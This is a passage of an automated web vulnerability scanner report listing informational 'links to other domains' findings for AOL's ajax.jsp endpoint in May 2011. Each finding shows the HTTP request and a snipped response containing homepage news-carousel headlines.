<a id="dlimg" name="om_dl7_image" class="photo-link lnid-sec1_lnk1 icid-maing-grid7|main5|dl7|sec1_lnk1|60594" href="http://aol.sportingnews.com/nba/story/2011-05-05/lakers-have-problems-and-are-running-out-of-time-to-fix-them"><img height="217" alt="Dirk Nowitzki posts up Lamar Odom in the second half in Game Two of the Western Conference Semifinals" width="386" src="http://o.aolcdn.com/hss/storage/adam/6b259a1fdeac0bf0b61d0050d30d10b7/dirk-nowitzki-386vm050511.jpg"/></a>
...[SNIP]...
<h2><a name="om_dl7_hdln" onclick=" " href="http://aol.sportingnews.com/nba/story/2011-05-05/lakers-have-problems-and-are-running-out-of-time-to-fix-them" class=" lnid-sec1_lnk2 icid-maing-grid7|main5|dl7|sec1_lnk2|60594">Mavericks Expose an L.A. Problem</a>
...[SNIP]...
<p class="lede-link"><a name="om_dl7_cpy" href="http://aol.sportingnews.com/nba/story/2011-05-05/lakers-have-problems-and-are-running-out-of-time-to-fix-them" class=" lnid-sec1_lnk3 icid-maing-grid7|main5|dl7|sec1_lnk3|60594">Why the champs are <i>
...[SNIP]...
<li ><a name="om_dl7_slede1" class="dl-sublede-link bold lnid-sec3_lnk1 icid-maing-grid7|main5|dl7|sec3_lnk1|60594" href="http://aol.sportingnews.com/sport/story/2011-05-04/kentucky-derby-field">2011 Kentucky Derby Field Unveiled</a>
...[SNIP]...
<li ><a name="om_dl7_slede2" class="dl-sublede-link bold lnid-sec3_lnk2 icid-maing-grid7|main5|dl7|sec3_lnk2|60594" href="http://aol.sportingnews.com/nhl/feed/2011-05/washingtontampa-bay/story/bergenheim-helps-lightning-complete-sweep-of-washington-capitals">NHL No. 1 Seed Swept Out of Playoffs</a>
...[SNIP]...
<li ><a name="om_dl7_slede3" class="dl-sublede-link bold lnid-sec3_lnk3 icid-maing-grid7|main5|dl7|sec3_lnk3|60594" href="http://aol.sportingnews.com/nfl/story/2011-05-04/rashard-mendenhall-turns-to-blog-to-clarify-controversial-tweets">Steelers Star Explains 9/11 Comments</a>
...[SNIP]...

16.10. http://www.aol.com/ajax.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aol.com
Path:   /ajax.jsp

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.aol.com/ajax.jsp?m=dynamiclead&p=dynamicleadslide&vbclass=vid_over&dlNo=5&ajax=1&sitHot=&offset=0&slot=dynamiclead&vcslot=dynamiclead-video-config
The response contains the following links to other domains:
  • http://o.aolcdn.com/hss/storage/adam/d04cf6bff6a42e183cb3394e023e4a0/anyas-moms-wedding-dress-386kk0405.jpg
  • http://www.huffingtonpost.com/2011/05/04/jennifer-lopez-harem-pants_n_857334.html
  • http://www.huffingtonpost.com/2011/05/04/oldest-newlyweds-rose-pollard-forrest-lunsway_n_857312.html
  • http://www.stylelist.com/2011/05/04/my-mothers-70s-wedding-dress/

Request

GET /ajax.jsp?m=dynamiclead&p=dynamicleadslide&vbclass=vid_over&dlNo=5&ajax=1&sitHot=&offset=0&slot=dynamiclead&vcslot=dynamiclead-video-config HTTP/1.1
Host: www.aol.com
Proxy-Connection: keep-alive
Referer: http://www.aol.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; tst=%2C1%2Cs391a%3A%2C1%2Cs392a%3A%2C1%2Cs393a%3A%2C1%2Cs394a%3A%2C1%2Cs395a%3A%2C1%2Cs396a%3A%2C1%2Cs397a; RSP_COOKIE=aid=c5999d1676b211e08f73fc32f1f68f78; s_pers=%20s_getnr%3D1304614868360-Repeat%7C1367686868360%3B%20s_nrgvo%3DRepeat%7C1367686868361%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; rrpmo1=NaN; stips5=1; dlact=dl4

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 12:02:15 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache, no-store, private, max-age=0
Expires: 0
R-Host: vm-149-174-24-50.asset.aol.com
Content-Type: text/javascript;charset=UTF-8
Cteonnt-Length: 2435
Set-Cookie: JSESSIONID=A40CCB6A99F401AA8EDE16636ADD46B1; Path=/aol
Content-Length: 2435

<span class="dn" id="#curr-dlcount">11</span>
<span id="slduration" title="10000"></span>
<div class="mnid-dl5 plid-60529 display-lightbox">
<span class="dn" id="dl-vid"></
...[SNIP]...
</span>
<a id="dlimg" name="om_dl5_image" class="photo-link lnid-sec1_lnk1 icid-maing-grid7|main5|dl5|sec1_lnk1|60529" href="http://www.stylelist.com/2011/05/04/my-mothers-70s-wedding-dress/"><img height="217" alt="Anya Strzemien" width="386" src="http://o.aolcdn.com/hss/storage/adam/d04cf6bff6a42e183cb3394e023e4a0/anyas-moms-wedding-dress-386kk0405.jpg"/></a>
...[SNIP]...
<h2><a name="om_dl5_hdln" href="http://www.stylelist.com/2011/05/04/my-mothers-70s-wedding-dress/" class=" lnid-sec1_lnk2 icid-maing-grid7|main5|dl5|sec1_lnk2|60529">Why I Wear My Mom's Wedding Dress
</a>
...[SNIP]...
<p class="lede-link"><a name="om_dl5_cpy" href="http://www.stylelist.com/2011/05/04/my-mothers-70s-wedding-dress/" class=" lnid-sec1_lnk3 icid-maing-grid7|main5|dl5|sec1_lnk3|60529">Pics of the dress now and in 1973
</a>
...[SNIP]...
<li ><a name="om_dl5_slede1" class="dl-sublede-link bold lnid-sec3_lnk1 icid-maing-grid7|main5|dl5|sec3_lnk1|60529" href="http://www.huffingtonpost.com/2011/05/04/oldest-newlyweds-rose-pollard-forrest-lunsway_n_857312.html">Meet Oldest Couple to Be Married
</a>
...[SNIP]...
<li ><a name="om_dl5_slede3" class="dl-sublede-link bold lnid-sec3_lnk3 icid-maing-grid7|main5|dl5|sec3_lnk3|60529" href="http://www.huffingtonpost.com/2011/05/04/jennifer-lopez-harem-pants_n_857334.html">J.Lo Brings Back Old Pants Style
</a>
...[SNIP]...

16.11. http://www.aol.com/ajax.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aol.com
Path:   /ajax.jsp

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.aol.com/ajax.jsp?m=dynamiclead&p=dynamicleadslide&vbclass=vid_over&dlNo=1&ajax=1&sitHot=&offset=0&slot=dynamiclead&vcslot=dynamiclead-video-config
The response contains the following links to other domains:
  • http://i.huffpost.com/gen/273394/thumbs/a-OSAMA-386x217.jpg
  • http://www.huffingtonpost.com/2011/05/04/afghanistan-pakistan-bin-laden_n_857555.html
  • http://www.huffingtonpost.com/2011/05/04/bin-laden-dead-photo_n_857772.html
  • http://www.huffingtonpost.com/2011/05/04/dems-plan-oil-subsidy-vote_n_857685.html
  • http://www.huffingtonpost.com/2011/05/04/joe-biden-debt-ceiling_n_857738.html

Request

GET /ajax.jsp?m=dynamiclead&p=dynamicleadslide&vbclass=vid_over&dlNo=1&ajax=1&sitHot=&offset=0&slot=dynamiclead&vcslot=dynamiclead-video-config HTTP/1.1
Host: www.aol.com
Proxy-Connection: keep-alive
Referer: http://www.aol.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; tst=%2C1%2Cs391a%3A%2C1%2Cs392a%3A%2C1%2Cs393a%3A%2C1%2Cs394a%3A%2C1%2Cs395a%3A%2C1%2Cs396a%3A%2C1%2Cs397a; rrpmo1=rr1~6~1304556981389~0; stips5=1; RSP_COOKIE=aid=c5999d1676b211e08f73fc32f1f68f78; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; s_pers=%20s_getnr%3D1304575136213-Repeat%7C1367647136213%3B%20s_nrgvo%3DRepeat%7C1367647136214%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; dlact=dl12

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:59:15 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache, no-store, private, max-age=0
Expires: 0
R-Host: vm-149-174-25-35.asset.aol.com
Content-Type: text/javascript;charset=UTF-8
Cteonnt-Length: 2421
Set-Cookie: JSESSIONID=BF713CDFEEC54B891A28081E9C94F8AE; Path=/aol
Content-Length: 2421

<span class="dn" id="#curr-dlcount">13</span>
<span id="slduration" title="10000"></span>
<div class="mnid-dl1 plid-60572 display-lightbox">
<span class="dn" id="dl-vid"></
...[SNIP]...
</span>
<a id="dlimg" name="om_dl1_image" class="photo-link lnid-sec1_lnk1 icid-maing-grid7|main5|dl1|sec1_lnk1|60572" href="http://www.huffingtonpost.com/2011/05/04/bin-laden-dead-photo_n_857772.html"><img height="217" alt="Osama bin Laden" width="386" src="http://i.huffpost.com/gen/273394/thumbs/a-OSAMA-386x217.jpg"/></a>
...[SNIP]...
<h2><a name="om_dl1_hdln" href="http://www.huffingtonpost.com/2011/05/04/bin-laden-dead-photo_n_857772.html" class=" lnid-sec1_lnk2 icid-maing-grid7|main5|dl1|sec1_lnk2|60572">Media Defends Posting Gruesome Pics

</a>
...[SNIP]...
<p class="lede-link"><a name="om_dl1_cpy" href="http://www.huffingtonpost.com/2011/05/04/bin-laden-dead-photo_n_857772.html" class=" lnid-sec1_lnk3 icid-maing-grid7|main5|dl1|sec1_lnk3|60572">Warning: shots are extremely graphic
</a>
...[SNIP]...
<li ><a name="om_dl1_slede1" class="dl-sublede-link bold lnid-sec3_lnk1 icid-maing-grid7|main5|dl1|sec3_lnk1|60572" href="http://www.huffingtonpost.com/2011/05/04/dems-plan-oil-subsidy-vote_n_857685.html">Dems to Force Vote on Oil Subsidies
</a>
...[SNIP]...
<li ><a name="om_dl1_slede2" class="dl-sublede-link bold lnid-sec3_lnk2 icid-maing-grid7|main5|dl1|sec3_lnk2|60572" href="http://www.huffingtonpost.com/2011/05/04/joe-biden-debt-ceiling_n_857738.html">Joe Biden Steps Into Debt Ceiling Void </a>
...[SNIP]...
<li ><a name="om_dl1_slede3" class="dl-sublede-link bold lnid-sec3_lnk3 icid-maing-grid7|main5|dl1|sec3_lnk3|60572" href="http://www.huffingtonpost.com/2011/05/04/afghanistan-pakistan-bin-laden_n_857555.html">Afghanistan: 'Pakistan Had to Know'</a>
...[SNIP]...

16.12. http://www.aol.com/ajax.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aol.com
Path:   /ajax.jsp

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.aol.com/ajax.jsp?m=dynamiclead&p=dynamicleadslide&vbclass=vid_over&dlNo=8&ajax=1&sitHot=&offset=0&slot=dynamiclead&vcslot=dynamiclead-video-config
The response contains the following links to other domains:
  • http://celebra.aollatino.com/2010/04/29/spanish-quiz/
  • http://celebra.aollatino.com/2010/04/29/tequila-drinks-quiz/
  • http://celebra.aollatino.com/2010/04/29/tequila-history-facts-quiz/
  • http://i.huffpost.com/gen/273921/thumbs/a-CINCO-DE-MAYO-386x217.jpg
  • http://noticias.aollatino.com/2010/04/15/five-of-may/

Request

GET /ajax.jsp?m=dynamiclead&p=dynamicleadslide&vbclass=vid_over&dlNo=8&ajax=1&sitHot=&offset=0&slot=dynamiclead&vcslot=dynamiclead-video-config HTTP/1.1
Host: www.aol.com
Proxy-Connection: keep-alive
Referer: http://www.aol.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; tst=%2C1%2Cs391a%3A%2C1%2Cs392a%3A%2C1%2Cs393a%3A%2C1%2Cs394a%3A%2C1%2Cs395a%3A%2C1%2Cs396a%3A%2C1%2Cs397a; RSP_COOKIE=aid=c5999d1676b211e08f73fc32f1f68f78; s_pers=%20s_getnr%3D1304614868360-Repeat%7C1367686868360%3B%20s_nrgvo%3DRepeat%7C1367686868361%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; rrpmo1=NaN; stips5=1; dlact=dl7

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 12:02:50 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache, no-store, private, max-age=0
Expires: 0
R-Host: vm-149-174-25-38.asset.aol.com
Content-Type: text/javascript;charset=UTF-8
Cteonnt-Length: 2296
Set-Cookie: JSESSIONID=245978DD9294CA6A02BA7A7074CB40E4; Path=/aol
Content-Length: 2296

<span class="dn" id="#curr-dlcount">11</span>
<span id="slduration" title="10000"></span>
<div class="mnid-dl8 plid-60486 display-lightbox">
<span class="dn" id="dl-vid"></
...[SNIP]...
</span>
<a id="dlimg" name="om_dl8_image" class="photo-link lnid-sec1_lnk1 icid-maing-grid7|main5|dl8|sec1_lnk1|60486" href="http://noticias.aollatino.com/2010/04/15/five-of-may/"><img height="217" alt="Cinco de Mayo" width="386" src="http://i.huffpost.com/gen/273921/thumbs/a-CINCO-DE-MAYO-386x217.jpg"/></a>
...[SNIP]...
<h2><a name="om_dl8_hdln" href="http://noticias.aollatino.com/2010/04/15/five-of-may/" class=" lnid-sec1_lnk2 icid-maing-grid7|main5|dl8|sec1_lnk2|60486">Why Is Cinco De Mayo a Holiday?
</a>
...[SNIP]...
<p class="lede-link"><a name="om_dl8_cpy" href="http://noticias.aollatino.com/2010/04/15/five-of-may/" class=" lnid-sec1_lnk3 icid-maing-grid7|main5|dl8|sec1_lnk3|60486">Surprising facts about the holiday
</a>
...[SNIP]...
<li ><a name="om_dl8_slede1" class="dl-sublede-link bold lnid-sec3_lnk1 icid-maing-grid7|main5|dl8|sec3_lnk1|60486" href="http://celebra.aollatino.com/2010/04/29/spanish-quiz/">Quiz: Test Your Spanish Skills
</a>
...[SNIP]...
<li ><a name="om_dl8_slede2" class="dl-sublede-link bold lnid-sec3_lnk2 icid-maing-grid7|main5|dl8|sec3_lnk2|60486" href="http://celebra.aollatino.com/2010/04/29/tequila-history-facts-quiz/">The Four Types of Tequila Are ...
</a>
...[SNIP]...
<li ><a name="om_dl8_slede3" class="dl-sublede-link bold lnid-sec3_lnk3 icid-maing-grid7|main5|dl8|sec3_lnk3|60486" href="http://celebra.aollatino.com/2010/04/29/tequila-drinks-quiz/">What's Your Personal Tequila Drink?
</a>
...[SNIP]...

16.13. http://www.aol.com/ajax.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aol.com
Path:   /ajax.jsp

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.aol.com/ajax.jsp?m=dynamiclead&p=dynamicleadslide&vbclass=vid_over&dlNo=9&ajax=1&sitHot=&offset=0&slot=dynamiclead&vcslot=dynamiclead-video-config
The response contains the following links to other domains:
  • http://o.aolcdn.com/hss/storage/adam/6374677899dea4e42ce0725b8f3b188d/macaroni-and-cheese386lh050211.jpg
  • http://www.huffingtonpost.com/2011/05/03/taco-bell-cheesy-double-decker-taco_n_856790.html
  • http://www.huffingtonpost.com/2011/05/04/white-castle-online-orders_n_857416.html
  • http://www.huffingtonpost.com/adam-roberts/restaurant-mistakes_b_854601.html
  • http://www.huffingtonpost.com/endless-simmer/macaroni-and-cheese-ideas_b_852998.html

Request

GET /ajax.jsp?m=dynamiclead&p=dynamicleadslide&vbclass=vid_over&dlNo=9&ajax=1&sitHot=&offset=0&slot=dynamiclead&vcslot=dynamiclead-video-config HTTP/1.1
Host: www.aol.com
Proxy-Connection: keep-alive
Referer: http://www.aol.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; tst=%2C1%2Cs391a%3A%2C1%2Cs392a%3A%2C1%2Cs393a%3A%2C1%2Cs394a%3A%2C1%2Cs395a%3A%2C1%2Cs396a%3A%2C1%2Cs397a; rrpmo1=rr1~6~1304556981389~0; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; stips5=1; s_pers=%20s_getnr%3D1304575085859-Repeat%7C1367647085859%3B%20s_nrgvo%3DRepeat%7C1367647085861%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; dlact=dl7

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:58:07 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache, no-store, private, max-age=0
Expires: 0
R-Host: vm-149-174-27-32.asset.aol.com
Content-Type: text/javascript;charset=UTF-8
Cteonnt-Length: 2637
Set-Cookie: JSESSIONID=C2C9AF6EF07E0F5552CCDBA3B421B0B8; Path=/aol
Content-Length: 2637

<span class="dn" id="#curr-dlcount">13</span>
<span id="slduration" title="10000"></span>
<div class="mnid-dl9 plid-60552 display-lightbox">
<span class="dn" id="dl-vid"></
...[SNIP]...
</span>
<a id="dlimg" name="om_dl9_image" class="photo-link lnid-sec1_lnk1 icid-maing-grid7|main5|dl9|sec1_lnk1|60552" href="http://www.huffingtonpost.com/endless-simmer/macaroni-and-cheese-ideas_b_852998.html#s268735&amp;title=10_Mac_n"><img height="217" alt="Mac and cheese" width="386" src="http://o.aolcdn.com/hss/storage/adam/6374677899dea4e42ce0725b8f3b188d/macaroni-and-cheese386lh050211.jpg"/></a>
...[SNIP]...
<h2><a name="om_dl9_hdln" onclick=" " href="http://www.huffingtonpost.com/endless-simmer/macaroni-and-cheese-ideas_b_852998.html#s268735&amp;title=10_Mac_n" class=" lnid-sec1_lnk2 icid-maing-grid7|main5|dl9|sec1_lnk2|60552">10 Odd Ways to Use Mac & Cheese
</a>
...[SNIP]...
<p class="lede-link"><a name="om_dl9_cpy" href="http://www.huffingtonpost.com/endless-simmer/macaroni-and-cheese-ideas_b_852998.html#s268735&amp;title=10_Mac_n" class=" lnid-sec1_lnk3 icid-maing-grid7|main5|dl9|sec1_lnk3|60552">Pics that may make your mouth water
</a>
...[SNIP]...
<li ><a name="om_dl9_slede1" class="dl-sublede-link bold lnid-sec3_lnk1 icid-maing-grid7|main5|dl9|sec3_lnk1|60552" href="http://www.huffingtonpost.com/adam-roberts/restaurant-mistakes_b_854601.html">10 Restaurant Mistakes to Avoid
</a>
...[SNIP]...
<li ><a name="om_dl9_slede2" class="dl-sublede-link bold lnid-sec3_lnk2 icid-maing-grid7|main5|dl9|sec3_lnk2|60552" href="http://www.huffingtonpost.com/2011/05/03/taco-bell-cheesy-double-decker-taco_n_856790.html">Taco Bell's New Item Taste-Tested
</a>
...[SNIP]...
<li ><a name="om_dl9_slede3" class="dl-sublede-link bold lnid-sec3_lnk3 icid-maing-grid7|main5|dl9|sec3_lnk3|60552" href="http://www.huffingtonpost.com/2011/05/04/white-castle-online-orders_n_857416.html">New Way to Order at White Castle
</a>
...[SNIP]...

16.14. http://www.aol.com/ajax.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aol.com
Path:   /ajax.jsp

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.aol.com/ajax.jsp?m=dynamiclead&p=dynamicleadslide&vbclass=vid_over&dlNo=3&ajax=1&sitHot=&offset=0&slot=dynamiclead&vcslot=dynamiclead-video-config
The response contains the following links to other domains:
  • http://o.aolcdn.com/hss/storage/adam/b9b4010e8ef8fd1b93d138ae626941ba/mom-style-icon-amanda-both-386kk0504.jpg
  • http://www.huffingtonpost.com/2011/05/04/kate-middleton-photoshop_n_857564.html
  • http://www.huffingtonpost.com/2011/05/04/sarah-burton-kate-middleton-wedding-dress_n_857308.html
  • http://www.huffingtonpost.com/piper-weiss/my-mom-the-style-icon-pho_b_857621.html
  • http://www.stylelist.com/2011/05/04/hilary-swank-look-of-the-day/

Request

GET /ajax.jsp?m=dynamiclead&p=dynamicleadslide&vbclass=vid_over&dlNo=3&ajax=1&sitHot=&offset=0&slot=dynamiclead&vcslot=dynamiclead-video-config HTTP/1.1
Host: www.aol.com
Proxy-Connection: keep-alive
Referer: http://www.aol.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; tst=%2C1%2Cs391a%3A%2C1%2Cs392a%3A%2C1%2Cs393a%3A%2C1%2Cs394a%3A%2C1%2Cs395a%3A%2C1%2Cs396a%3A%2C1%2Cs397a; stips5=1; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; s_pers=%20s_getnr%3D1304575003664-Repeat%7C1367647003664%3B%20s_nrgvo%3DRepeat%7C1367647003665%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; dlact=dl2; rrpmo1=rr1~2~1304556981389~0

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:56:47 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache, no-store, private, max-age=0
Expires: 0
R-Host: vm-149-174-25-35.asset.aol.com
Content-Type: text/javascript;charset=UTF-8
Cteonnt-Length: 2590
Set-Cookie: JSESSIONID=B5F28F5E1FE07A793511CE9FC001A06B; Path=/aol
Content-Length: 2590

<span class="dn" id="#curr-dlcount">13</span>
<span id="slduration" title="10000"></span>
<div class="mnid-dl3 plid-60532 display-lightbox">
<span class="dn" id="dl-vid"></
...[SNIP]...
</span>
<a id="dlimg" name="om_dl3_image" class="photo-link lnid-sec1_lnk1 icid-maing-grid7|main5|dl3|sec1_lnk1|60532" href="http://www.huffingtonpost.com/piper-weiss/my-mom-the-style-icon-pho_b_857621.html#s272161&amp;title=The_Tulle_Topper"><img height="217" alt="Pic of Stylish Mom" width="386" src="http://o.aolcdn.com/hss/storage/adam/b9b4010e8ef8fd1b93d138ae626941ba/mom-style-icon-amanda-both-386kk0504.jpg"/></a>
...[SNIP]...
<h2><a name="om_dl3_hdln" href="http://www.huffingtonpost.com/piper-weiss/my-mom-the-style-icon-pho_b_857621.html#s272161&amp;title=The_Tulle_Topper" class=" lnid-sec1_lnk2 icid-maing-grid7|main5|dl3|sec1_lnk2|60532">Proof That Moms Can Be Very Stylish

</a>
...[SNIP]...
<p class="lede-link"><a name="om_dl3_cpy" href="http://www.huffingtonpost.com/piper-weiss/my-mom-the-style-icon-pho_b_857621.html#s272161&amp;title=The_Tulle_Topper" class=" lnid-sec1_lnk3 icid-maing-grid7|main5|dl3|sec1_lnk3|60532">Images show real-life 'style icons'

</a>
...[SNIP]...
<li ><a name="om_dl3_slede1" class="dl-sublede-link bold lnid-sec3_lnk1 icid-maing-grid7|main5|dl3|sec3_lnk1|60532" href="http://www.huffingtonpost.com/2011/05/04/kate-middleton-photoshop_n_857564.html">Kate Middleton Gets Photoshopped</a>
...[SNIP]...
<li ><a name="om_dl3_slede2" class="dl-sublede-link bold lnid-sec3_lnk2 icid-maing-grid7|main5|dl3|sec3_lnk2|60532" href="http://www.huffingtonpost.com/2011/05/04/sarah-burton-kate-middleton-wedding-dress_n_857308.html">Dress Designer Breaks Her Silence
</a>
...[SNIP]...
<li ><a name="om_dl3_slede3" class="dl-sublede-link bold lnid-sec3_lnk3 icid-maing-grid7|main5|dl3|sec3_lnk3|60532" href="http://www.stylelist.com/2011/05/04/hilary-swank-look-of-the-day/">Hilary Swank Dons Nude Ensemble
</a>
...[SNIP]...

16.15. http://www.aol.com/ajax.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aol.com
Path:   /ajax.jsp

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.aol.com/ajax.jsp?m=dynamiclead&p=dynamicleadslide&vbclass=vid_over&dlNo=11&ajax=1&sitHot=&offset=0&slot=dynamiclead&vcslot=dynamiclead-video-config
The response contains the following links to other domains:
  • http://o.aolcdn.com/hss/storage/adam/5a2571070ba3fe04b68a6fa658632a28/pharows-trap-386lvg050411.jpg
  • http://www.games.com/game/backgammon/
  • http://www.games.com/game/family-feud/
  • http://www.games.com/game/sarah-quest-the-pharaohs-trap/
  • http://www.games.com/game/star-marbles/

Request

GET /ajax.jsp?m=dynamiclead&p=dynamicleadslide&vbclass=vid_over&dlNo=11&ajax=1&sitHot=&offset=0&slot=dynamiclead&vcslot=dynamiclead-video-config HTTP/1.1
Host: www.aol.com
Proxy-Connection: keep-alive
Referer: http://www.aol.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; tst=%2C1%2Cs391a%3A%2C1%2Cs392a%3A%2C1%2Cs393a%3A%2C1%2Cs394a%3A%2C1%2Cs395a%3A%2C1%2Cs396a%3A%2C1%2Cs397a; rrpmo1=rr1~6~1304556981389~0; stips5=1; RSP_COOKIE=aid=c5999d1676b211e08f73fc32f1f68f78; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; s_pers=%20s_getnr%3D1304575110110-Repeat%7C1367647110110%3B%20s_nrgvo%3DRepeat%7C1367647110112%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; dlact=dl10

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:58:32 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache, no-store, private, max-age=0
Expires: 0
R-Host: vm-149-174-24-49.asset.aol.com
Content-Type: text/javascript;charset=UTF-8
Cteonnt-Length: 2275
Set-Cookie: JSESSIONID=C5F9615C0457F6AD2629C4B0D8985FFD; Path=/aol
Content-Length: 2275

<span class="dn" id="#curr-dlcount">13</span>
<span id="slduration" title="10000"></span>
<div class="mnid-dl11 plid-60483 display-lightbox">
<span class="dn" id="dl-vid"><
...[SNIP]...
</span>
<a id="dlimg" name="om_dl11_image" class="photo-link lnid-sec1_lnk1 icid-maing-grid7|main5|dl11|sec1_lnk1|60483" href="http://www.games.com/game/sarah-quest-the-pharaohs-trap/"><img height="217" alt="Pharaohs Trap" width="386" src="http://o.aolcdn.com/hss/storage/adam/5a2571070ba3fe04b68a6fa658632a28/pharows-trap-386lvg050411.jpg"/></a>
...[SNIP]...
<h2><a name="om_dl11_hdln" href="http://www.games.com/game/sarah-quest-the-pharaohs-trap/" class=" lnid-sec1_lnk2 icid-maing-grid7|main5|dl11|sec1_lnk2|60483">This Level Took Us 2 Mins. to Beat
</a>
...[SNIP]...
<p class="lede-link"><a name="om_dl11_cpy" href="http://www.games.com/game/sarah-quest-the-pharaohs-trap/" class=" lnid-sec1_lnk3 icid-maing-grid7|main5|dl11|sec1_lnk3|60483">Hurry up before time runs out
</a>
...[SNIP]...
<li ><a name="om_dl11_slede1" class="dl-sublede-link bold lnid-sec3_lnk1 icid-maing-grid7|main5|dl11|sec3_lnk1|60483" href="http://www.games.com/game/family-feud/">Think You Can Beat 'Family Feud'?
</a>
...[SNIP]...
<li ><a name="om_dl11_slede2" class="dl-sublede-link bold lnid-sec3_lnk2 icid-maing-grid7|main5|dl11|sec3_lnk2|60483" href="http://www.games.com/game/star-marbles/">Try to Beat the Clock in Star Marbles
</a>
...[SNIP]...
<li ><a name="om_dl11_slede3" class="dl-sublede-link bold lnid-sec3_lnk3 icid-maing-grid7|main5|dl11|sec3_lnk3|60483" href="http://www.games.com/game/backgammon/">Take On Your Friends in Backgammon
</a>
...[SNIP]...

16.16. http://www.aol.com/ajax.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aol.com
Path:   /ajax.jsp

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.aol.com/ajax.jsp?m=dynamiclead&p=dynamicleadslide&vbclass=vid_over&dlNo=3&ajax=1&sitHot=&offset=0&slot=dynamiclead&vcslot=dynamiclead-video-config
The response contains the following links to other domains:
  • http://o.aolcdn.com/hss/storage/adam/962ab85e9f469332d79a7364f9c4d87e/judges-386a-05052011.jpg
  • http://www.tvsquad.com/2011/05/04/james-durbin-emotionally-perfect-without-you-idol-video/
  • http://www.tvsquad.com/2011/05/05/bad-experience-at-male-strip-club-ellie-kemper-kimmel-video/
